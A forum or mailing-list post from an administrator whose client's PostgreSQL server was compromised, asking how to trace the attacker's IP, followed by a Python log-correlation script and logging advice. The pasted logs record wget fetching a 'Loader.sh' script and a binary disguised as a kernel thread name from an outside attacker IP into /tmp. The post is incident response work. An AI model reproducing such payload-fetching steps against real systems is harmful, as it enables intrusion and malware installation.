Recently a client suffered an intrusion through PostgreSQL; the person sent
a loader via SQL and downloaded several malicious files.

Does anyone know how to find out the IP of the person who accessed
PostgreSQL? Apparently I am not managing to.

I am checking the logs and this is all I have:

2016-06-15 02:05:05 EDT [15644-1] postgres@sisrh FATAL:  database "sisrh" does not exist
--2016-06-15 06:31:16--  http://155.94.224.246:5432/Loader.sh
Connecting to 155.94.224.246:5432... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1058 (1.0K) [application/octet-stream]
Saving to: ‘/tmp/Loader.sh’

     0K .                                                     100% 86.9M=0s

2016-06-15 06:31:16 (86.9 MB/s) - ‘/tmp/Loader.sh’ saved [1058/1058]

scsi_eh_128: no process found
scsi_eh_128: no process found
scsi_eh_128: no process found
scsi_eh_256: no process found
scsi_eh_256: no process found
scsi_eh_256: no process found
scsi_eh_512: no process found
scsi_eh_512: no process found
scsi_eh_512: no process found
scsi_eh_56: no process found
scsi_eh_56: no process found
scsi_eh_56: no process found
scsi_eh_56: no process found
scsi_eh_320: no process found
scsi_eh_320: no process found
scsi_eh_320: no process found
--2016-06-15 06:31:16--  http://155.94.224.246:5432/scsi_eh_320
Connecting to 155.94.224.246:5432... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1334372 (1.3M) [application/octet-stream]
Saving to: ‘/tmp/scsi_eh_320’

     0K .......... .......... .......... .......... ..........  3% 90.1K 14s



-- 
Anderson Silva
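
The log prefix in the message above carries a timestamp, backend PID and user@database, but no client address. The following is an added example, not part of the original message: it assumes `log_connections = on` was set in postgresql.conf (so each backend logs a "connection received: host=..." line) and that the prefix format is the one inferred from the single log line above; it ties each backend PID's entries to the client host that opened the session. The sample lines and addresses are constructed.

```python
import re

# Prefix shape inferred from the one server line in the post
# (timestamp, [pid-line], user@db); this is an assumption.
LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d \S+) \[(?P<pid>\d+)-\d+\] "
    r"(?P<user>\S+)@(?P<db>\S+) (?P<sev>[A-Z]+\d?):\s+(?P<msg>.*)$"
)
# Message PostgreSQL writes per new connection when log_connections is on.
RECEIVED = re.compile(r"connection received: host=(?P<host>\S+)")

# Constructed sample log (documentation-range addresses, not from the post).
SAMPLE = [
    "2016-06-15 02:05:05 EDT [15644-1] [unknown]@[unknown] LOG:  "
    "connection received: host=192.0.2.10 port=40112",
    '2016-06-15 02:05:05 EDT [15644-2] postgres@sisrh FATAL:  '
    'database "sisrh" does not exist',
    "Saving to: '/tmp/example'",  # non-server output mixed into the same file
    "2016-06-15 02:07:11 EDT [15650-3] postgres@postgres LOG:  "
    "statement: SELECT 1",        # session opened before this log excerpt begins
]


def sessions_by_host(lines):
    """Return (ts, client_host, user, db, severity, message) per server entry."""
    host_of = {}  # backend pid -> client host from its "connection received" line
    entries = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip anything that is not a PostgreSQL log entry
        received = RECEIVED.search(m["msg"])
        if received:
            # PIDs are reused over time; the most recent connection wins.
            host_of[m["pid"]] = received["host"]
            continue
        entries.append((m["ts"], host_of.get(m["pid"], "unknown"),
                        m["user"], m["db"], m["sev"], m["msg"]))
    return entries


if __name__ == "__main__":
    for entry in sessions_by_host(SAMPLE):
        print(entry)
```

Adding `%h` (or `%r` for host and port) to `log_line_prefix` puts the client address on every line and makes this correlation unnecessary for future logs.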